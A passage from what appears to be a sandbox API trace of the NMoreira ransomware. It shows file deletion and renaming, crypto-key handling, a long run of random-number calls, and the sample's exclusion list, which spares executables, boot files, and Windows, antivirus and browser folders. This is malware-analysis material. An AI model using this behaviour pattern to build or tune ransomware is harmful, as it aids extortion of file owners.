hFile=0x588, lpBuffer=0x2974d38*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0162.933] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Blue_Gradient.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\blue_gradient.jpg")) returned 0x20 [0162.933] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Blue_Gradient.jpg", dwFileAttributes=0x20) returned 0 [0162.933] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Blue_Gradient.jpg") returned 1 [0162.933] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Blue_Gradient.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\blue_gradient.jpg")) returned 0 [0162.933] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Blue_Gradient.jpg" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Blue_Gradient.jpg") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Blue_Gradient.jpg" [0162.934] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Blue_Gradient.jpg" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery") returned 1 [0162.934] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXEFD4.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxefd4.tmp")) returned 0xefd4 [0162.934] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Blue_Gradient.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\blue_gradient.jpg"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXEFD4.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxefd4.tmp"), dwFlags=0x1) returned 0 [0162.934] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXEFD4.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxefd4.tmp")) returned 1 [0162.935] CryptDestroyKey (hKey=0x9ad138) returned 1 [0162.935] wcslen (_String="OK") returned 0x2 [0162.935] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0162.935] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0162.935] CryptDestroyKey (hKey=0x9ad378) returned 1 [0162.935] CryptDestroyHash (hHash=0x9ad678) returned 1 [0162.935] CryptReleaseContext (hProv=0x8e3bb0, dwFlags=0x0) returned 1 [0162.935] FindNextFileW (in: hFindFile=0x9ad238, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0162.935] PathMatchSpecW (pszFile="Cave_Drawings.gif", pszSpec="*NMCRYPT") returned 0 [0162.935] PathMatchSpecW (pszFile="Cave_Drawings.gif", pszSpec="*Recovers your files.html") returned 0 [0162.935] PathMatchSpecW (pszFile="Cave_Drawings.gif", pszSpec="*.exe") returned 0 [0162.935] PathMatchSpecW (pszFile="Cave_Drawings.gif", pszSpec="*.dll") returned 0 [0162.935] PathMatchSpecW (pszFile="Cave_Drawings.gif", pszSpec="*.lnk") returned 0 [0162.935] PathMatchSpecW (pszFile="Cave_Drawings.gif", pszSpec="*.bat") returned 0 [0162.935] PathMatchSpecW (pszFile="Cave_Drawings.gif", pszSpec="*.ini") returned 0 [0162.935] PathMatchSpecW (pszFile="Cave_Drawings.gif", pszSpec="*.msi") returned 0 [0162.935] PathMatchSpecW (pszFile="Cave_Drawings.gif", pszSpec="*.scf") returned 0 [0162.935] PathMatchSpecW (pszFile="Cave_Drawings.gif", pszSpec="*pagefile.sys*") returned 0 [0162.935] PathMatchSpecW (pszFile="Cave_Drawings.gif", pszSpec="*NTUSER.DAT*") returned 0 [0162.935] PathMatchSpecW (pszFile="Cave_Drawings.gif", pszSpec="*AppData*") returned 0 [0162.935] PathMatchSpecW (pszFile="Cave_Drawings.gif", pszSpec="*\\winrar\\*") returned 0 [0162.935] PathMatchSpecW (pszFile="Cave_Drawings.gif", pszSpec="*\\Internet Explorer\\*") returned 0 [0162.935] PathMatchSpecW (pszFile="Cave_Drawings.gif", pszSpec="*\\java\\*") returned 0 [0162.935] PathMatchSpecW (pszFile="Cave_Drawings.gif", pszSpec="*\\TeamViewer\\*") returned 0 [0162.935] PathMatchSpecW (pszFile="Cave_Drawings.gif", pszSpec="*\\windows\\*") returned 0 [0162.935] PathMatchSpecW (pszFile="Cave_Drawings.gif", pszSpec="*\\ESET\\*") returned 0 [0162.935] PathMatchSpecW (pszFile="Cave_Drawings.gif", pszSpec="*\\AVG\\*") returned 0 [0162.935] PathMatchSpecW (pszFile="Cave_Drawings.gif", pszSpec="*\\AVIRA\\*") returned 0 [0162.935] PathMatchSpecW (pszFile="Cave_Drawings.gif", pszSpec="*\\AVAST Software\\*") returned 0 [0162.935] PathMatchSpecW (pszFile="Cave_Drawings.gif", pszSpec="*Atheros*") returned 0 [0162.935] PathMatchSpecW (pszFile="Cave_Drawings.gif", pszSpec="*Realtek*") returned 0 [0162.935] PathMatchSpecW (pszFile="Cave_Drawings.gif", pszSpec="*bootmgr*") returned 0 [0162.935] PathMatchSpecW (pszFile="Cave_Drawings.gif", pszSpec="*boot*") returned 0 [0162.935] PathMatchSpecW (pszFile="Cave_Drawings.gif", pszSpec="*boot*") returned 0 [0162.935] PathMatchSpecW (pszFile="Cave_Drawings.gif", pszSpec="*CONFIG.SYS*") returned 0 [0162.935] PathMatchSpecW (pszFile="Cave_Drawings.gif", pszSpec="*IO.SYS*") returned 0 [0162.935] PathMatchSpecW (pszFile="Cave_Drawings.gif", pszSpec="*MSDOS.SYS*") returned 0 [0162.935] PathMatchSpecW (pszFile="Cave_Drawings.gif", pszSpec="*NTDETECT.COM*") returned 0 [0162.935] PathMatchSpecW (pszFile="Cave_Drawings.gif", pszSpec="*ntldr*") returned 0 [0162.935] PathMatchSpecW (pszFile="Cave_Drawings.gif", pszSpec="*chrome*") returned 0 [0162.935] PathMatchSpecW (pszFile="Cave_Drawings.gif", pszSpec="*opera*") returned 0 [0162.935] PathMatchSpecW (pszFile="Cave_Drawings.gif", pszSpec="*firefox*") returned 0 [0162.936] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Cave_Drawings.gif", pszSpec="*") returned 1 [0162.936] strlen (_Str="NMoreira") returned 0x8 [0162.936] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.936] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.936] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.936] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.936] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.936] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.936] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.936] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.936] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.936] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.936] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.936] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.936] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.936] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.936] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.936] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.936] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.936] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.936] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.936] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.936] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.936] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.936] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.936] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.936] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.936] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.936] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.936] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.936] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.936] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.936] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.936] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.936] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.936] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.936] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.936] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.936] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.936] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.936] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.936] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.936] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.936] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.936] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.936] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.936] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.936] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.936] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.937] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.937] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.937] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.937] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.937] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.937] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.937] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.937] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.937] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.937] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.937] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.937] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.937] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.937] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.937] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.937] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.937] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.937] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.937] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.937] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.937] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.937] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.937] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.937] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.937] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.937] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.937] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.937] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.937] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.937] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.937] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.937] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.937] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.937] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.937] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.937] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.937] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.937] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.937] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.937] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.937] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.937] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.937] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.937] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.937] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.937] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.937] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.937] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.937] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.937] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.938] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.938] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.938] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.938] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.938] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.938] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.938] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.938] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.938] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.938] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.938] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.938] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.938] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.938] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.938] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.938] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.938] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.938] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.938] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.938] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.938] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.938] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.938] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.938] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.938] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.938] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.938] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.938] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.938] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.938] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.938] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.938] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.938] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.938] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.938] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.938] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.938] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.938] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.938] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.938] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.938] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.938] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.938] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.938] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.938] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.938] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.938] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.938] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.938] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.939] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.939] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.939] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.939] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.939] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.939] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: 